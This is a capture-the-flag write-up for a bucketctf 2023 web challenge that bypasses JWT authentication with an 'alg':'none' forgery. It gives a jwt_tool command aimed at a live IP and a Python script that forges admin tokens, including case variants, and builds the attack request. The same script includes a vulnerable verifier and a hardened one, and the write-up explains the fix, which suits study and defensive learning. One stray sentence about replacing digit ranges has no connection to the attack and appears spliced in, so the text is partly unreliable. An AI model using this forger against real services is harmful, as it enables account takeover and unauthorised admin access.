Made with ❤ by n0x
Auth @ bucketctf 2023 (web)
------ Description --------------------------------------------------------
> I just started learning about a new authentication method called JWT.
> This is my first website with it, could you check if it's secure?
------ TL;DR --------------------------------------------------------------
As the description hints, the challenge is about a JWT vulnerability. The
website has a '/register' page, so we can create an account and obtain a
JWT for it.
However, no route reachable by default lets us send a JWT back to the
server.
So we first have to find a route (or some other way) that accepts a token,
and only then can we try to bypass the authentication with a forged one.
------ Solution -----------------------------------------------------------
First I ran gobuster against the website to look for a page that accepts a
JWT.
The '/info' route led to a '/validate' route, which expects the token as a
GET parameter.
We can now attack the JWT with jwt_tool, using dillonfrank's fork for its
GET-parameter support (the -gd option).
Then I replaced '[0-4]' with '0' and '[5-9]' with '1'.
=== shell =================================================================
# -M at: run all tests against the target; -gd: send the token as a GET
# parameter; -I -pc/-pv: tamper the 'username' claim to 'admin' in each test
~$ python3 jwt_tool.py -M at \
   -t "http://213.133.103.186:6307/validate?" \
   -gd "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QyIiwiaWF0IjoxNjgwOTk2ODgyfQ.2qodlmGmM19ZFZE-aCWb1FyC9YNiHwxrRw2Bu3WX840" \
   -I -pc username -pv admin
[...]
jwttool_e0e5c45b9f118f38e4bccbf97821f92e Exploit: "alg":"none" (-X a)
Response Code: 200, 37 bytes
[...]
# -Q: replay the logged request by its ID and show the full response
~$ python3 jwt_tool.py -Q "jwttool_e0e5c45b9f118f38e4bccbf97821f92e"
===========================================================================
The server returns a 200 for the "alg":"none" exploit (-X a): a token whose
header declares no algorithm, whose signature is dropped, and whose
username claim now says admin. Querying that log entry with -Q shows the
response body, which contains the flag.
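To make the exploit concrete, here is the "alg":"none" forgery done by hand, together with a toy verifier that has the bug and one that does not. This is an added example for this writeup, not code from the challenge or from jwt_tool: the HS256 secret is made up (the server's real key is unknown), and the two verifiers are illustrations of the flaw and its fix, not the challenge's implementation.

```python
"""Forge an "alg":"none" JWT by hand and show why a verifier that trusts the
token's own header accepts it.  Added example for this writeup; it is not
code from the challenge or from jwt_tool.  SECRET is constructed (the real
server's HS256 key is unknown), and the two verifiers are toy illustrations
of a vulnerable and a hardened check, not the challenge's implementation.
"""
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple
from urllib.parse import quote

# Token from the writeup: header {"alg":"HS256","typ":"JWT"},
# payload {"username":"test2","iat":1680996882}, signed by the server.
ORIGINAL_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VybmFtZSI6InRlc3QyIiwiaWF0IjoxNjgwOTk2ODgyfQ."
    "2qodlmGmM19ZFZE-aCWb1FyC9YNiHwxrRw2Bu3WX840"
)
SECRET = b"constructed-demo-secret"  # constructed: only the local verifiers use it


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_part(obj: dict) -> str:
    # Compact JSON, as JWT libraries emit it.
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def decode_jwt(token: str) -> Tuple[dict, dict, str]:
    """Split a JWT into (header, payload, signature) without verifying anything."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed JWT: expected header.payload.signature")
    return (json.loads(b64url_decode(parts[0])),
            json.loads(b64url_decode(parts[1])),
            parts[2])


def hs256_signature(signing_input: str, key: bytes) -> str:
    return b64url_encode(hmac.new(key, signing_input.encode(), hashlib.sha256).digest())


def make_hs256_token(payload: dict, key: bytes) -> str:
    """What a correct /register does: a properly signed HS256 token."""
    signing_input = encode_part({"alg": "HS256", "typ": "JWT"}) + "." + encode_part(payload)
    return signing_input + "." + hs256_signature(signing_input, key)


def forge_alg_none(token: str, overrides: dict, alg: str = "none") -> str:
    """The jwt_tool '-X a' exploit by hand: keep the victim's claims, rewrite
    the ones we want, declare alg=none and send an empty signature.  No key
    is needed.  'alg' lets you try the case variants ("None", "NONE", "nOnE")
    that some libraries fail to reject."""
    _, payload, _ = decode_jwt(token)
    forged_payload = {**payload, **overrides}
    signing_input = encode_part({"alg": alg, "typ": "JWT"}) + "." + encode_part(forged_payload)
    return signing_input + "."  # trailing dot, nothing after it


def verify_trusting_header(token: str, key: bytes) -> Optional[dict]:
    """VULNERABLE: lets the attacker-controlled header pick the algorithm."""
    header, payload, signature = decode_jwt(token)
    signing_input = token.rsplit(".", 1)[0]
    alg = str(header.get("alg", "")).lower()
    if alg == "none":
        return payload  # "no signature needed" -> any forged claims are accepted
    if alg == "hs256" and hmac.compare_digest(hs256_signature(signing_input, key), signature):
        return payload
    return None


def verify_pinned_hs256(token: str, key: bytes) -> Optional[dict]:
    """HARDENED: the server decides the algorithm; the header is only checked
    for agreement, and a valid signature is always required."""
    header, payload, signature = decode_jwt(token)
    if header.get("alg") != "HS256" or not signature:
        return None
    signing_input = token.rsplit(".", 1)[0]
    if not hmac.compare_digest(hs256_signature(signing_input, key), signature):
        return None
    return payload


def build_validate_url(base: str, token: str) -> str:
    """The request jwt_tool's -gd option sends: /validate?token=<jwt>."""
    return base.rstrip("/") + "/validate?token=" + quote(token, safe="")


if __name__ == "__main__":
    forged = forge_alg_none(ORIGINAL_TOKEN, {"username": "admin"})
    print("forged token:", forged)
    print("GET", build_validate_url("http://213.133.103.186:6307", forged))
    print("trusting verifier accepts forged:", verify_trusting_header(forged, SECRET) is not None)
    print("pinned verifier accepts forged:  ", verify_pinned_hs256(forged, SECRET) is not None)
```

Run it and GET the printed URL with curl to reproduce what jwt_tool's -X a test sent; the token it prints is the same shape jwt_tool generates. The fix is the pinned verifier: the server, not the token, names the algorithm. With PyJWT that means always passing `algorithms=["HS256"]` to `jwt.decode`, and never accepting an empty signature.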
------ Flag ---------------------------------------------------------------
bucket{1_l0v3_jwt!!!1!!!!1!!!!!1111!}